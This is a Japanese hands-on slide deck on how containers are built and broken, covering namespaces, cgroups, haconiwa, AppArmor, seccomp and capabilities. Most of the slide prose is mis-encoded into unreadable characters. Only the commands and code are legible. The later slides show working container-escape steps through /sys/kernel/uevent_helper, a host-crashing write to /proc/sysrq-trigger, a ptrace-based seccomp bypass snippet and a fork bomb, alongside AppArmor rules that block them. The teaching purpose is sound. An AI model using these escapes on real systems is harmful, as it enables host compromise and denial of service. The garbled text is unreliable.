コンテナの作り方、壊し方 / Container Structure and Exploitation Method

by mrtc0

Slide 1

Slide 1 text

ίϯςφͷ࡞Γํɺյ͠ํ ίϯςφͷηΩϡϦςΟΛ஌Ζ͏ ৿ాߒฏ !NSUD (.01FQBCP *OD ηΩϡϦςΟɾϛχΩϟϯϓJOѪඤ

Slide 2

Slide 2 text

(.0ϖύϘηΩϡϦςΟରࡦࣨ ৿ాߒฏ!NSUD ,PIFJ.PSJUB IUUQTCMPHTTSGJO

Slide 3

Slide 3 text

೥ʹηΩϡϦςΟΩϟϯϓશࠃେձʹࢀՃ ೥ΑΓ4&$$0/#FHJOOFSTߨࢣ େֶࡏֶத͸ΠΤϥΤηΩϡϦςΟʹͯ8FC੬ऑੑ਍அʢΞϧόΠτʣ ೥౓*1"ະ౿ΫϦΤΠλʔ ೥ʹ(.0ϖύϘגࣜձࣾʹೖࣾ

Slide 4

Slide 4 text

TFDDBNQ

Slide 5

Slide 5 text

͸͡Ίʹ wຊεϥΠυ͸ʮ۝भηΩϡϦςΟΧϯϑΝϨϯεʯͰಉ྅ͷۙ౻Ӊஐ࿕͞Μ @udzura ͱൃදͨ͠಺༰ΛҰ෦վมͨ͠΋ͷͰ͋Δ wʮίϯςφͷηΩϡϦςΟΛத਎͔Βཧղ͠Α͏ʯ wIUUQTTQFBLFSEFDLDPNVE[VSBJOTJEFPVUDPOUBJOFSBOEJUTTFDVSJUZ wεϥΠυͷར༻ͷڐՄΛ௖͖ɺҰ෦վม͍ͯ͠·͢ wշ୚௖͍ͨ!VE[VSB͞Μʹײँ͍ͨ͠·͢

Slide 6

Slide 6 text

͸͡Ίʹ wԋशϝΠϯͳͷͰɺࠔͬͨΒۙ͘ͷਓɺνϡʔλʔ͞ΜΛཔΓ·͠ΐ͏ wίϚϯυ͕ࣦഊ͢Δɺૢ࡞͕Θ͔Βͳ͍ͳͲ͸ɺͲΜͲΜฉ͍͍ͯͩ͘͞ wνʔτγʔτΛ༻ҙ͍ͯ͠ΔͷͰ͝׆༻͍ͩ͘͞ wάϧʔϓͷਓͱ࿩͠ͳ͕ΒਐΊͯ0,Ͱ͢ wੵۃతʹձ࿩͍ͯͩ͘͠͞ʂ

Slide 7

Slide 7 text

"HFOEB ίϯςφԾ૝Խͱ͸ʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏ ίϯςφΛ࡞ͬͯΈΑ͏ ίϯςφͷηΩϡϦςΟϞσϧͱ"UUBDL4VSGBDFT ίϯςφΛյͦ͏

Slide 8

Slide 8 text

ࠓ೔ͷΰʔϧ ίϯςφͷ࢓૊ΈΛͬ͘͟Γཧղ͠Α͏ ίϯςφͷηΩϡϦςΟػߏΛ஌Ζ͏ εΠʔενʔζϞσϧΛମݧ͠Α͏

Slide 9

Slide 9 text

ίϯςφԾ૝Խͱ͸ʁ

Slide 10

Slide 10 text

࣍ͷιϑτ΢ΣΞΛ ࢖ͬͨ͜ͱ͕͋Δํʁ

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

Ծ૝Խ 7JSUVBMJ[BUJPO

Slide 15

Slide 15 text

͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04 ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

Slide 16

Slide 16 text

Slide 17

Slide 17 text

ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏

Slide 18

Slide 18 text

ίϯςφ͸Ͳ͜Ͱ࢖ΘΕ͍ͯΔ͔

Slide 19

Slide 19 text

ίϯςφ͕ͲͷΑ͏ʹ࢖ΘΕ͍ͯΔ͔ IUUQTFOXJLJQFEJBPSHXJLJ,VCFSOFUFT

Slide 20

Slide 20 text

ίϯςφͷηΩϡϦςΟ ίϯςφϥϯλΠϜࣗମͷ࣮૷ ίϯςφͷηΩϡϦςΟϙϦγʔ ίϯςφͷωοτϫʔΫ ΦʔέετϨʔγϣϯϚωʔδυαʔϏε

Slide 21

Slide 21 text

ίϯςφͷ࣮૷

Slide 22

Slide 22 text

-9$ )"$0/*8" SLU

Slide 23

Slide 23 text

ίϯςφͷϝϦοτ QSPT

Slide 24

Slide 24 text

ίϯςφͷϝϦοτ ىಈ͕ߴ଎ɺܰྔ ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

Slide 25

Slide 25 text

ίϯςφͷϝϦοτ ىಈ͕ߴ଎ɺܰྔ ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ Ϋϥ΢υʹ޲͍͍ͯΔ ΞϓϦέʔγϣϯΛؙ͝ͱίϯςφԽɺߴ଎ͳσϓϩΠɺ։ൃ

Slide 26

Slide 26 text

ίϯςφͷσϝϦοτ DPOT

Slide 27

Slide 27 text

ݖݶ෼཭ Ϧιʔεޮ཰ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕ ݖݶ෼཭͕ऑ͍

Slide 28

Slide 28 text

ίϯςφͷத਎Λͷ͍ͧͯΈΑ͏ IUUQTqJDLSQBB,5I

Slide 29

Slide 29 text

ίϯςφ͸Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

Slide 30

Slide 30 text

࣍ͷը໘Λݟͨ͜ͱ͕͋Δํʁ

Slide 31

Slide 31 text

No content

Slide 32

Slide 32 text

No content

Slide 33

Slide 33 text

ϓϩηε 1SPDFTT

Slide 34

Slide 34 text

ίϯςφ͸ϓϩηε

Slide 35

Slide 35 text

$ ./a.out BPVU -JOVYΧʔωϧ ϥΠϒϥϦ γεςϜίʔϧ

Slide 36

Slide 36 text

BPVU $ ps xf -C a.out 3262 ? S 0:00 sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

Slide 37

Slide 37 text

BPVU $ ps xf -C a.out 3262 ? S 0:00 sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out

Slide 38

Slide 38 text

$ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) execve(“/bin/cat”, …)

Slide 39

Slide 39 text

$ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) ಛघͳॲཧ

Slide 40

Slide 40 text

ίϯςφ͸ ಛघͳ ϓϩηε

Slide 41

Slide 41 text

ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

Slide 42

Slide 42 text

ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ -JOVY /BNFTQBDF DHSPVQT

Slide 43

Slide 43 text

ʮίϯςφ͸ϓϩηεͰ͋Δʯ ͜ͱΛ֬ೝ

Slide 44

Slide 44 text

%PDLFSίϯςφͷىಈ $ docker ps -a CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1 "/usr/sbin/apache2ct…" $ docker start 4521 $ curl localhost:8080 -s | grep '' Apache2 Ubuntu Default Page: It works

Slide 45

Slide 45 text

ϓϩηεπϦʔΛ֬ೝ $ ps auxf $ sudo apt-get install apache2 && sudo systemctl start apache2 %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏ ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏

Slide 46

Slide 46 text

-JOVY/BNFTQBDF

Slide 47

Slide 47 text

-JOVY/BNFTQBDFΛ֬ೝ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1 “/usr/sbin/apache2ct…" $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ # exit # ίϯςφ͔Βൈ͚ͯ $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ

Slide 48

Slide 48 text

$ ip a # ϗετଆ 2: enp0s3: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever

Slide 49

Slide 49 text

Slide 50

Slide 50 text

ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ $ docker exec -ti 45 hostname 4521880cffa8 $ hostname ubuntu-xenial w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏

Slide 51

Slide 51 text

ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ w ϓϩηεʹ͸ϓϩηε*% 1*% ͕͋Δ͕ɺͦͷ࠾൪͕ʮಠཱʯ͍ͯ͠Δ w ಉ͡1*%ʹҧ͏ϓϩηεׂ͕Γ౰ͯΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti 45 ps auxf $ ps auxf

Slide 52

Slide 52 text

Πϝʔδ host-1 192.168.1.1/24 container-1 172.16.1.1/24 container-2 10.1.1.1/24 ϗετ04 -JOVY ίϯςφ ίϯςφ w ʮϓϩηεΛ෼཭ʯ͍ͯ͠Δɻ04ͷػೳ͸ϗετͱڞ༗ɻ

Slide 53

Slide 53 text

/BNFTQBDF͸ Ͳ͜Ͱ֬ೝ͢Δʁ

Slide 54

Slide 54 text

/BNFTQBDFΛݟΔ $ ps auxf | grep -A 10 docker[d] ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏ $ sudo ls -l /proc/$PID/ns ҎԼͷσΟϨΫτϦΛௐ΂Δ $ sudo ls -l /proc/self/ns ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏

Slide 55

Slide 55 text

$ sudo ls -l /proc/3625/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276] lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274] lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279] lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275] $ sudo ls -l /proc/self/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839] lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840] lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957] lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838] ໨EJ⒎͠Α͏

Slide 56

Slide 56 text

&OUFSUIF/BNFTQBDF w ωοτϫʔΫۭؒͷΈʹΞλονͯ͠ΈΑ͏ JQBͷ݁Ռ͸%PDLFSϗετͱൺ΂ͯͲ͏ʁ IPTUOBNFͷ࣮ߦ݁Ռ͸ʁ $ sudo nsenter --net -t $PID $ sudo nsenter --uts -t $PID

Slide 57

Slide 57 text

-JOVY/BNFTQBDF ໊લۭؒ ֓ཁ 1*%໊લۭؒ 1*%ͷ෼཭ Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭ *1$໊લۭؒ *1$ͷ෼཭ ωοτϫʔΫ໊લۭؒ ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭ 654໊લۭؒ ϗετ໊ͷ෼཭ Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭

Slide 58

Slide 58 text

DHSPVQ

Slide 59

Slide 59 text

ίϯςφͷϝϦοτ ىಈ͕ߴ଎ɺܰྔ ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

Slide 60

Slide 60 text

ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ ϝϞϦͷׂ౰Λ֬ೝ͠Α͏ $ CID=$(docker inspect -f '{{.ID}}' 45) $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=8m -d minicamp-1); $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

Slide 61

Slide 61 text

ൺֱ͠Α͏ ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti $CID bash $ docker exec -ti $CID2 bash wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏ ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@d6a2825b878a:/# apt-get update

Slide 62

Slide 62 text

DHSPVQTͰ੍ޚͰ͖Δ΋ͷ w $16 w ϝϞϦ w σΟεΫ*0ͷଳҬ w ϓϩηε਺ w FUDʜ

Slide 63

Slide 63 text

ίϯςφΛ࡞ͬͯΈΑ͏ IUUQTqJDLSQBQH/#

Slide 64

Slide 64 text

)BDPOJXB w @udzura (.0ϖύϘ ΒʹΑͬͯ։ൃ͞Εͨ-JOVYίϯςφϥϯλΠϜ w NSVCZͰઃఆ΍ϑοΫΛهड़Ͱ͖Δͷ͕ಛ௃ w IUUQTHJUIVCDPNIBDPOJXBIBDPOJXB $ haconiwa version haconiwa: v0.9.5

Slide 65

Slide 65 text

Πϝʔδ SPPUGT Λ࡞Δ $ mkdir /tmp/minicamp $ docker export 45 | sudo tar -xv -f - -C /tmp/minicamp/ $ ls /tmp/minicamp/ bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

Slide 66

Slide 66 text

ઃఆϑΝΠϧΛੜ੒ $ haconiwa init first-container.haco assign new haconiwa name = haconiwa-4ad5ea68 assign rootfs location = /var/lib/haconiwa/4ad5ea68 create first-container.haco

Slide 67

Slide 67 text

ઃఆΛมߋ # -*- mode: ruby -*- Haconiwa.define do |config| # The container name and container's hostname: config.name = "haconiwa-4ad5ea68" # The first process when invoking haconiwa run: config.init_command = "/bin/bash" # If your first process is a daemon, please explicitly daemonize by: # config.daemonize! . . . # The rootfs location on your host OS # Pathname class is useful: root = Pathname.new(“/tmp/minicamp”) config.chroot_to root

Slide 68

Slide 68 text

ίϯςφΛىಈ $ haconiwa run first-container.haco Create lock: # Container fork success and going to wait: pid=6855 groups: cannot find name for group ID 1000 root@haconiwa-4ad5ea68:/# ps ax PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 /bin/bash 8 pts/3 R+ 0:00 ps ax

Slide 69

Slide 69 text

εΫϥονͰ࡞Ζ͏

Slide 70

Slide 70 text

·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end p(Process.waitpid2 pid) $ hacorb test.rb bash-4.3$ pwd / bash-4.3$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

Slide 71

Slide 71 text

1*%໊લۭؒΛ෼཭ Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb bash-4.3$ mount -t proc proc /proc bash-4.3$ ps aux

Slide 72

Slide 72 text

DHSPVQΛઃఆ limit = “3" Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.mkdir "/sys/fs/cgroup/pids/minicamp" rescue nil system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max" system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks" Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb # ( echo 'test' | cat ) # bomb () { bomb | bomb & }; bomb

Slide 73

Slide 73 text

͜͜·Ͱͷ·ͱΊ w ίϯςφ͸ϗετ͔ΒݟΔͱ୯ͳΔϓϩηεͰ͋Δ w -JOVY͕࣋ͭίϯςφԽͷػೳΛ૊Έ߹Θ͍ͤͯΔ w ϓϩηεͷಠཱੑΛߴΊΔ /BNFTQBDF w ϦιʔεΛׂΓ͋ͯΔʢDHSPVQ w ͦΕҎ֎΋͋ΔΑ

Slide 74

Slide 74 text

෼΄Ͳٳܜ IUUQTqJDLSQQU,O/

Slide 75

Slide 75 text

ίϯςφͷηΩϡϦςΟϞσϧͱ "UUBDL4VSGBDFT IUUQTqJDLSQB)9

Slide 76

Slide 76 text

ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ

Slide 77

Slide 77 text

ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ w "QQ"SNPS w TFDDPNQ w ಛఆͷϑΝΠϧͷύʔϛογϣϯΛམͱ͢

Slide 78

Slide 78 text

Slide 79

Slide 79 text

"UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ

Slide 80

Slide 80 text

"UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ Χʔωϧͷ੬ऑੑΛಥ͘

Slide 81

Slide 81 text

"UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ☠ ίϯςφͷઃఆෆඋΛಥ͘ FHEPDLFSQSJWJMFHFE

Slide 82

Slide 82 text

"UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘

Slide 83

Slide 83 text

"UUBDL4VSGBDFT ,FSOFM 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘ $POUBJOFS $POUBJOFS $POUBJOFS

Slide 84

Slide 84 text

εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ

Slide 85

Slide 85 text

ίϯςφΛյͦ͏

Slide 86

Slide 86 text

$POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

Slide 87

Slide 87 text

"QQ"SNPS

Slide 88

Slide 88 text

"QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

Slide 89

Slide 89 text

/sys/kernel/uevent_helper wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

Slide 90

Slide 90 text

ίϯςφΛىಈͯ͠ઃఆ $ haconiwa start sample1.haco root@sample:/# echo “export PATH=$PATH” >> /root/.bashrc root@sample:/# bash root@sample:/# apt-get install gcc

Slide 91

Slide 91 text

ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh” > /sys/kernel/uevent_helper

Slide 92

Slide 92 text

ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $ ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;)

Slide 93

Slide 93 text

QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

Slide 94

Slide 94 text

"QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏ wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM

Slide 95

Slide 95 text

๷͍ͰΈΑ͏ $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

Slide 96

Slide 96 text

๷͍ͰΈΑ͏ $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

Slide 97

Slide 97 text

๷͍ͰΈΑ͏ $ haconiwa start sample1.haco root@sample1:/# top bash: /usr/bin/top: Permission denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied

Slide 98

Slide 98 text

"QQ"SNPSʹΑΔอޢ w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

Slide 99

Slide 99 text

TFDDPNQ

Slide 100

Slide 100 text

TFDDPNQ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call

Slide 101

Slide 101 text

TFDDPNQΛମݧ͠Α͏ $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call

Slide 102

Slide 102 text

TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘ ېࢭ͞Ε͍ͯΔγεςϜίʔϧ

Slide 103

Slide 103 text

TFDDPNQͷCZQBTT wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

Slide 104

Slide 104 text

TFDDPNQΛCZQBTTͯ͠ΈΑ͏ root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ

Slide 105

Slide 105 text

NLEJS TFDDPNQ Bad system call

Slide 106

Slide 106 text

HFUQJE TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS

Slide 107

Slide 107 text

QUSBDF kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }

Slide 108

Slide 108 text

-JOVY$BQBCJMJUZ

Slide 109

Slide 109 text

wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU ͳͲ DISPPU QUSBDF 3"8ιέοτ QJOHͳͲ SFCPPU ͱLFYFD@MPBE -JOVY$BQBCJMJUZ

Slide 110

Slide 110 text

έΠύϏϦςΟΛମݧ͠Α͏ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms

Slide 111

Slide 111 text

